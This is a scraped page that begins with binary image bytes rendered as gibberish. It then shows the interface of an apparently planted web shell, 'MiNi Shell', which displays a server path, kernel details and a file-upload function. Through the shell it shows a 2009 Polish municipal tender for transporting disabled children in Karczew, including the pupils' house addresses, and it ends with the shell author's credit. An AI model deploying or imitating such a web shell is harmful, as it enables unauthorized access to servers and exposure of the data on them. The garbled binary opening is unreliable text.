JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090702/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090702/104351-N-2009.html

<p class="kh_header"><b>Karczew: ZP-341-1-10-09  Dowóz dzieci niepełnosprawnych (w tym na wózkach inwalidzkich) do Ośrodka Szkolno-Wychowawczego w Świdrze, ul. Majowa 17/19, 05-402 Otwock wraz z opieką nad dziećmi, w okresie od dnia 1 września 2009 r. do dnia 30 czerwca 2010 r.</b><br>
<b>Numer ogłoszenia: 104351 - 2009; data zamieszczenia: 02.07.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Karczew z siedzibą w Karczewie , ul. Warszawska 28, 05-480 Karczew, woj. mazowieckie, tel. 022 7806516, faks 022 7806536.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.karczew.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> ZP-341-1-10-09  Dowóz dzieci niepełnosprawnych (w tym na wózkach inwalidzkich) do Ośrodka Szkolno-Wychowawczego w Świdrze, ul. Majowa 17/19, 05-402 Otwock wraz z opieką nad dziećmi, w okresie od dnia 1 września 2009 r. do dnia 30 czerwca 2010 r..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia jest dowożenie dzieci niepełnosprawnych od  poniedziałku do piątku w dni nauki szkolnej z domu do Specjalnego Ośrodka Szkolno-Wychowawczego w  Świdrze przy ul. Majowej 17/19 na godz. 8.00 oraz odwożenie ich ze szkoły o godz. 11.40, 13.30 i 14.30 do domu w okresie od 01 września 2009 roku do 30 czerwca 2010 roku,  
2. Wykaz miejscowości oraz ilość uczniów dowożonych do Specjalnego Ośrodka     Szkolno-Wychowawczego w Otwocku:

- Otwock Mały 28  -              1 dziecko (wózek)
     - Kępa Nadbrzeska 1 -           1 dziecko (wózek)
     - Glinki 108 -                         2 dzieci    
     - Brzezinka 43 -                     1 dziecko (wózek)
     - Brzezinka 61 -                      1 dziecko
     - Karczew, ul. Podlaska 21 - 1 dziecko (wózek)
     - Karczew, ul. Różana 12 -    1 dziecko (wózek)
- Ostrówek 25 m.3 -                1 dziecko
- Całowanie 36 -                      1 dziecko
- Całowanie 30 -                      1 dziecko

Razem       11 dzieci z czego 5-ro jest na wózkach inwalidzkich

a) wykaz miejscowości oraz ilość uczniów dowożonych na godzinę 8.00
Trasa
(nazwa miejscowości)		ilość uczniów		liczba wózków
Ostrówek			             1				0
Glinki				2				0
Kępa Nadbrzeska		             1				1
Otwock Mały			1				1
Razem				5				2

b) wykaz miejscowości oraz ilość uczniów dowożonych na godzinę 8.00
Trasa
(nazwa miejscowości)		ilość uczniów		liczba wózków
Całowanie			2				0
Brzezinka			             2				1
Karczew 			             1				1
Karczew 			             1				1
Razem 			             6				3

c) wykaz miejscowości oraz ilość uczniów odwożonych o godzinie 11.40
Trasa
(nazwa miejscowości)		ilość uczniów		liczba wózków
Karczew 			             1				1
Kępa Nadbrzeska		             1				1
Razem				2				2

d)  wykaz miejscowości oraz ilość uczniów odwożonych o godzinie 13.30
 Trasa
(nazwa miejscowości)		ilość uczniów		liczba wózków
Karczew				            1			1 
Brzezinka			             	2			1
Całowanie				2			0
Razem					5			2

e) wykaz miejscowości oraz ilość uczniów odwożonych o godzinie 14.30
 Trasa
(nazwa miejscowości)		ilość uczniów		liczba wózków
Otwock Mały				1			1
Glinki 					2			0
Ostrówek				             1			0
Razem					4			1


3. Na wszystkich trasach przewozu uczniów wykonawca we własnym  zakresie winien       zabezpieczyć opiekę nad dziećmi, w trakcie przewozu uczniów wraz z doprowadzeniem      dzieci do budynku placówki. 
4. W przypadku choroby kierowcy, Wykonawca zobowiązany jest do zastąpienia go innym         kierowcą o wymaganych uprawnieniach.
5. W przypadku awarii pojazdu, Wykonawca zobowiązany jest do podstawienia innego pojazdu,          odpowiadającego wymaganiom do realizacji  zamówienia.
6. W okresie realizacji niniejszego zamówienia przewiduje się 194 dni roboczych. 
7. W okresie realizacji niniejszego zamówienia samochody pokonają trasę łącznie 33.080 km. 
8. Wykonawca ponosił będzie wszelkie koszty realizacji usługi tj.: remontu pojazdów, obsługi  technicznej pojazdu, usunięcia awarii, zmiany cen paliw, itp.
9. Cena ryczałtowa za 1 km realizacji usługi zawarta w ofercie będzie stała na okres trwania  umowy.
10. Dopuszcza się zmiany godziny przyjazdu i odjazdu dzieci do Ośrodka Szkolno-   Wychowawczego po ustaleniach Wykonawcy z dyrektorem placówki w przypadku np.: zmiany planu lekcji.
Wraz z Formularzem Oferty należy załączyć: dokumenty i oświadczenia wymagane  postanowieniami pkt 5 SIWZ, dowód wniesienia wadium, Oświadczenie Wykonawcy o kontynuowaniu ubezpieczenia od odpowiedzialności cywilnej w zakresie prowadzonej działalności gospodarczej, w przypadku gdy dokument ubezpieczeniowy, o którym mowa w  pkt 4.1.8.  pkt 5.1.8. wygaśnie w trakcie realizacji zamówienia  - załączniki nr 10 do SIWZ..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 60.10.00.00-9, 60.13.00.00-8.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Rozpoczęcie: 01.09.2009.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> 1700PLN<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy:
1. posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień,
2. posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym i osobami zdolnymi do wykonania zamówienia lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia,
3. znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia,
4. nie podlegają wykluczeniu z postępowania o udzielenie zamówienia,
5. udokumentują, że osoby, które będą uczestniczyć w wykonywaniu zamówienia posiadają:
          1)  w odniesieniu do kierowców, kserokopie aktualnych praw jazdy kierowców oraz 
             kserokopie zaświadczeń o przygotowaniu do wykonywania podstawowych czynności pielęgnacyjno - opiekuńczych tj. przeszkolenie w zakresie udzielania pierwszej pomocy medycznej lub przed medycznej osób,
          2) w odniesieniu do opiekunów, kserokopie zaświadczeń o przygotowaniu do wykonywania podstawowych czynności pielęgnacyjno - opiekuńczych tj. przeszkolenie w zakresie udzielania pierwszej pomocy medycznej lub przed medycznej osób. Spełnienie ww. warunku Zamawiający oceniał  będzie na podstawie załączonego do oferty wykazu, określonego  w pkt 5.1.7. SIWZ, sporządzonego wg wzoru stanowiącego załącznik nr 7 do SIWZ  i załączonych stosownych uprawnień,
   6. udokumentują, że w okresie ostatnich trzech lat przed dniem wszczęcia postępowania  o udzielenia zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, należycie wykonali min. jedną usługę rodzajowo porównywalną z przedmiotem niniejszego przetargu (jako usługi porównywalne uważa się dowóz  dzieci niepełnosprawnych, w tym na wózkach inwalidzkich do np. ośrodków opiekuńczych, o wartości zamówienia nie mniejszej niż 150 000,00 zł netto). Spełnienie ww. warunku Zamawiający oceniał będzie na podstawie załączonego do oferty wykazu, określonego w pkt 5.1.6. SIWZ, sporządzonego wg wzoru stanowiącego załącznik nr 6 do SIWZ i przedłożonych dokumentów potwierdzających, że ww. usługi zostały wykonane z należytą starannością,
  7. udokumentują, że dysponują min. 2 samochodami - środkami transportu, odpowiednio oznakowanymi,  przystosowanymi do przewozu osób niepełnosprawnych, wyposażonymi w specjalistyczny sprzęt tj. szyny do mocowania wózków, pasy do mocowania wózków, windy lub rampy. Środki transportu winny być wyprodukowane nie wcześniej niż w 2006 r. oraz posiadać ważne (na dzień składania ofert) pakiety ubezpieczeń O.C. i N.W. dla każdego samochodu - środka transportu wraz z  kopiami dowodów rejestracyjnych pojazdów. Spełnienie ww. warunku Zamawiający oceniał będzie na podstawie załączonego do oferty wykazu, określonego w pkt 5.1.9. SIWZ, sporządzonego wg wzoru stanowiącego załącznik nr 8 do SIWZ.
        8. udokumentują,  że posiadają ubezpieczenie od odpowiedzialności cywilnej w zakresie  prowadzonej działalności. Spełnienie ww. warunku Zamawiający oceniał będzie na podstawie załączonego do oferty dokumentu, określonego w pkt 5.1.8. SIWZ.
Opis sposobu dokonywania ceny spełniania warunków udziału w postępowaniu.
Spełnienie warunków opisanych w punkcie 4 SIWZ należy potwierdzić poprzez złożenie stosownych dokumentów i oświadczeń, o których mowa w punkcie 5 SIWZ.
Ocena spełnienia warunków wymaganych od Wykonawców zostanie dokonana wg formuły spełnia - nie spełnia..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 1. Na potwierdzenie spełnienia warunków udziału w postępowaniu należy załączyć:
1.1.Wypełnione i podpisane oświadczenie Wykonawcy, że nie podlega wykluczeniu na  podstawie art. 24 ust. 1 i ust. 2 ustawy Pzp  - załącznik nr 3 do SIWZ,
1.2.Wypełnione i podpisane oświadczenie Wykonawcy o spełnieniu warunków określonych w  art. 22 ust. 1 pkt 1-3 ustawy Pzp  - załącznik nr 4 do SIWZ,
1.3. Aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji   działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert,
1.4. Aktualne zaświadczenie właściwego Naczelnika Urzędu Skarbowego, że Wykonawca nie zalega z opłacaniem podatków lub zaświadczenie, że uzyskał zgodę na zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności, lub wstrzymanie w całości wykonania decyzji organu podatkowego, wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert,
1.5.Aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy     Rolniczego Ubezpieczenia Społecznego potwierdzające odpowiednio, że Wykonawca nie zalega z opłacaniem opłat oraz składek na ubezpieczenie zdrowotne lub społeczne, lub zaświadczenie, że uzyskał zgodę na zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności, wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert,
1.6.Wykaz wykonanych w okresie ostatnich trzech lat przed dniem wszczęcia postępowania            o udzielenia zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie usług, opracowany według wzoru stanowiącego załącznik nr 6 do SIWZ wraz z dokumentami potwierdzającymi, iż usługa została wykonana z należytą starannością,
  1.7. Wykaz osób, którymi dysponuje lub będzie dysponował Wykonawca i które będą uczestniczyć w wykonywaniu zamówienia (Wykaz osób (potencjał kadrowy) - opracowany według wzoru stanowiącego załącznik nr 7 do SIWZ). Informacja musi zawierać dane na temat doświadczenia wskazanych osób, potwierdzając jednocześnie spełnienie warunku określonego w pkt 4.1.5.,
            1.7.1. Pisemne zobowiązanie innych podmiotów do udostępnienia osób zdolnych do wykonania zamówienia, jeżeli w wykazie, o którym mowa w pkt 5.1.7., Wykonawca wskazał osoby, którymi będzie dysponował,
 1.8. Polisę, a w przypadku jej braku innego dokumentu potwierdzającego, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności,
1.9. Wykaz niezbędnych do wykonania zamówienia urządzeń - środków transportu, jakie posiada Wykonawca, opracowany według wzoru stanowiącego załącznik nr 8 do SIWZ,
           1.9.1. Pisemne zobowiązanie innych podmiotów do udostępnienia niezbędnych do wykonania zamówienia narzędzi i urządzeń, jeżeli w wykazie, o którym mowa w pkt 5.1.9., Wykonawca wskazał narzędzia i urządzenia, którymi będzie dysponował,
1.10. Aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy (dla osoby), wystawionej nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert,
1.11.Aaktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust.   1 pkt 9 ustawy (dla podmiotu zbiorowego), wystawionej nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert,
1.12. Aktualną licencję na wykonywanie transportu drogowego, w zakresie przewozu osób, zgodnie z ustawą z dnia 6 września 2001 r. o transporcie drogowym (t. j. Dz. U. z 2004 r. Nr 204, poz. 2088 z późn. zm.).
2. Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium. 
Wykonawcy mający siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej       Polskiej zamiast dokumentów wymienionych w pkt 1.3., pkt 1.4.,  pkt .1.5.,.1.10., 1.11., 1.12., składają dokumenty zgodnie z przepisami rozporządzenia wykonawczego do ustawy Pzp w sprawie rodzajów dokumentów jakich może żądać Zamawiający od Wykonawcy, oraz form, w jakich te dokumenty mogą być składane (Rozporządzenie Prezesa Rady Ministrów z dnia 16.10. 2008 r.).
3.   Zasady składania oferty przez podmioty występujące wspólnie: 
3.1. Oferta musi być podpisana przez wszystkie podmioty lub pełnomocnika..
3.1.2.Wymagane oświadczenia i dokumenty wskazane w pkt. 1.1., pkt 1.3., pkt .1.4.,  pkt 1.5., 1.8., 1.10., 1.12., winny być złożone  przez każdy podmiot..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.bip.karczew.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Gmina Karczew z siedzibą w Karczewie ul. Warszawska 28, 05-480 Karczew - koszt 7 PLN.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 10.07.2009 godzina 10:00, miejsce: Gmina Karczew z siedzibą w Karczewie ul. Warszawska 28, 05-480 Karczew, Biuro Obsługi Mieszkańców (parter).</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com